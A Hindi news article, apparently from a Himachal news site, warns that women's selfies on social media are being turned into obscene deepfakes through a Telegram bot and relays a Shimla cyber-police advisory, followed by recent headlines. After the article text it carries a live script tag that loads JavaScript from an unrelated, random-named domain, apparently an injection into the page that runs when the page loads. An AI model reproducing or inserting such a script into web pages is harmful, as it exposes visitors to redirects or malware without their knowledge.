Categories: हिमाचल

अगर आप भी हैं सोशल मीडिया पर सेल्फी डालने के शौकीन तो एक बार इस खबर को जरूर पढ़ें

<p>कोरोना के कारण लगे लॉकडाउन के बाद से लोगों का अधिकतर समय इंटरनेट पर ही बीत रहा है। लेकिन अब साइबर अपराध इतना ज्यादा बढ़ता जा रहा है कि यह हम सबके लिए एक बहुत बड़ी समस्या बनता जा रहा है। इंटरनेट पर पुरुषों की तुलना में महिलाएं कुछ ज्यादा ही तस्वीरें पोस्ट करती हैं। ये तस्वीरें व्हाट्सएप, फेसबुक, इंस्टाग्राम और स्नैपचैट पर पोस्ट की जाती हैं। साइबर अपराधी इन तस्वीरों का दुरुपयोग कर सकते हैं। इन तस्वीरों को बड़ी आसानी से डीपफेक टेक्नोलॉजी की मदद से अश्लील तस्वीरों में बदला जा सकता है। आर्टिफिशियल इंटेलिजेंस का इस्तेमाल कर इन तस्वीरों को डीपफेक बॉट की मदद से अश्लील तस्वीरों में बदला गया है। यह सब इतनी सफाई से किया जाता है कि असली और नकली तस्वीरों और वीडियो में फर्क कर पाना मुश्किल होता है। डीपफेक फेक से भी आगे की स्टेज है। बॉट दरअसल एक ऐसा रोबोट है, जो मैसेजिंग ऐप पर इंसानी बातचीत की नकल कर सकता है।</p>

<p>इंटरनेट पर मौजूद फेक अकाउंट का पता लगाने वाली कंपनी सेंसिटी ने हाल ही में पता लगाया है कि सोशल मीडिया पर डाली गई एक लाख महिलाओं की तस्वीरों को अश्लील तस्वीरों में बदला गया है। उन्हें इंटरनेट से हटाना भी मुमकिन नहीं है। इंटरनेट पर कोई आपत्तिजनक कंटेंट एक बार अपलोड हो जाए, तो उसे पूरी तरह से हटाना लगभग असंभव है। सेंसिटी की रिपोर्ट के मुताबिक, बॉट प्रसिद्ध सोशल मीडिया मैसेजिंग एप टेलीग्राम के एक चैनल पर उपलब्ध है। उपयोगकर्ता इससे महिलाओं की तस्वीरें भेजते हैं और बॉट उन्हें अश्लील तस्वीरों में बदल देता है। जिस टेलीग्राम को अब तक व्हाट्सएप से भी अधिक सुरक्षित माना जाता था, उसी पर महिलाओं के मान-सम्मान के साथ खिलवाड़ किया जा रहा है। जो वेबसाइट्स और सोशल मीडिया प्लेटफॉर्म कानूनों का पालन करते हैं, वे तो एक हद तक आपत्तिजनक कंटेंट को हटा भी सकते हैं, लेकिन इंटरनेट पर ऐसी लाखों-करोड़ों वेबसाइट्स हैं, जिनसे अश्लील और आपत्तिजनक कंटेंट को हटाना संभव नहीं है। कानून और पुलिस भी इन लाखों-करोड़ों वेबसाइट्स पर अंकुश लगाने में असमर्थ हैं। &nbsp;</p>

<p><img src=”/media/gallery/images/image(1552).png” style=”height:110px; width:900px” /></p>

<p>सोशल मीडिया की जिन तस्वीरों के साथ आसानी से छेड़छाड़ हो सकती है, उनमें ज्यादातर सेल्फीज होती हैं। सेल्फीज में चेहरा साफ-साफ दिखाई देता है और आमतौर पर इसके रेजोल्यूशन की गुणवत्ता भी बेहतर होती है। इसलिए सेल्फी कैमरे से ली गई किसी महिला के चेहरे की तस्वीर को किसी अश्लील तस्वीर के साथ जोड़ना आसान होता है। इसलिए साइबर अपराधी ज्यादातर सेल्फी का ही दुरुपयोग करते हैं। अलग-अलग एंगल से ली गई सेल्फी से चेहरे के अलग-अलग एंगल, डीपफेक तैयार करने वाले आर्टिफिशियल इंटेलिजेंस का काम बहुत आसान कर देते हैं और इनसे ऐसे वीडियोज तैयार किए जा सकते हैं, जिन्हें नकली मानना लगभग नामुमकिन होता है, क्योंकि इसमें चेहरे के सभी भाव, सभी एंगल मौजूद होते हैं। डीपफेक के जरिये केवल महिलाओं को ही बदनाम करने की कोशिश नहीं की जाती, बड़े-बड़े नेता, सेलिब्रिटीज और आम पुरुष भी इसके शिकार होते हैं। डीपफेक इंटरनेट की दुनिया का सबसे खतरनाक हथियार बन चुका है और इसके जरिये आपत्तिजनक वीडियो बनाकर किसी के भी जीवन को बर्बाद किया जा सकता है।</p>

<p>साइबर क्राइम पुलिस शिमला के अतिरिक्त पुलिस अधीक्षक नरवीर राठौर के अनुसार साइबर क्राइम ब्रांच ने लोगों को जागरूक करने के लिए एडवायजरी जारी की है। इसमें कहा गया है कि महिलाएं इंटरनेट मीडिया प्लेटफॉर्म पर अनजान लोगों से दूर रहें। उनसे निजी जानकारी साझा न करें। वाट्सएप पर कोई अन्य व्यक्ति आपको यदि किसी ग्रुप में जोड़े तो उसकी हिस्ट्री तलाशें। समूह से जुड़े लोगों की जानकारी लें। यदि सही न लगे तो तुरंत उस समूह से एक्जिट हो जाएं। इंटरनेट मीडिया पर अजनबियों के बीच अपने दस्तावेज और फोटो साझा न करें। इंटरनेट मीडिया पर नजर आने वाले किसी अज्ञात लिंक पर क्लिक न करें। ऐसा करने से आपका बैंक खाता हैक हो सकता है। अपने बैंक खाता, पासबुक, एटीएम, पिन, ओटीपी से संबंधित जानकारी किसी से साझा न करें। साथ ही ऑनलाइन खरीददारी करते समय इस बात का ख्याल लोगों को हमेशा रखना चाहिए। किसी सस्&zwj;ते और लुभावने ऑफर से सावधान रहें। जिस भी ऑनलाइन वेबसाइट से आप सामान खरीद रहे हैं, वह भरोसेमंद होनी चाहिए।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

उपमुख्यमंत्री ने की हिमाचल में जल शक्ति गौरव पुरस्कार आरंभ करने की घोषणा, उत्कृष्ट सेवाओं का होगा सम्मान

Jal Shakti Gaurav Awards:  उपमुख्यमंत्री मुकेश अग्निहोत्री ने प्रदेश में जल शक्ति विभाग के अधिकारियों…

13 hours ago

Kangra: अश्लील वीडियो बनाकर ब्लैकमेल करने वाले गिरोह का पर्दाफाश, दो आरोपी गिरफ्तार

कांगड़ा जिला पुलिस ने अश्लील वीडियो बनाकर ब्लैकमेल करने वाले गिरोह के दो सदस्यों को…

13 hours ago

टाइपिंग टेस्ट में भी गड़बड़ी, ओएमआर शीट से छेड़छाड़, अभ्यर्थियों सहित कुल 10 पर FIR

Recruitment Scam in Himachal: हिमाचल प्रदेश में पेपरलीक से जुड़े मामलों में एक और बड़ा…

13 hours ago

अब फोर्टिस कांगड़ा में सुनने और बोलने की समस्याओं का आधुनिक इलाज

  फोर्टिस अस्पताल, कांगड़ा में ऑडियोमेट्री यूनिट की शुरुआत, सुनने और बोलने की समस्याओं का…

14 hours ago

खोली गांव में 2.50 करोड़ की पेयजल योजना, सड़क निर्माण कार्य जारी

  Development in Kangra Assembly: कांगड़ा विधानसभा क्षेत्र में विकास की लहर लाते हुए मुख्यमंत्री…

17 hours ago

सुक्खू सरकार को हाईकोर्ट से झटका, इल्मा अफरोज को फ‍िर बद्दी एसपी भेजने के आदेश

  हिमाचल प्रदेश हाईकोर्ट ने महिला आईपीएस अधिकारी इल्मा अफरोज को बद्दी में तैनाती के…

19 hours ago